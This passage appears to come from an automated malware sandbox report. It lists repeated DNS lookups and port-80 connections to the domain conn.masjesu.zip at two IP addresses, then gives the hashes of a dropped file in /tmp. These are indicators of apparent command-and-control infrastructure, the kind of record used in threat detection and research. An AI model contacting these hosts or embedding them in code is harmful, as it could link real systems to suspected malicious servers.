| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |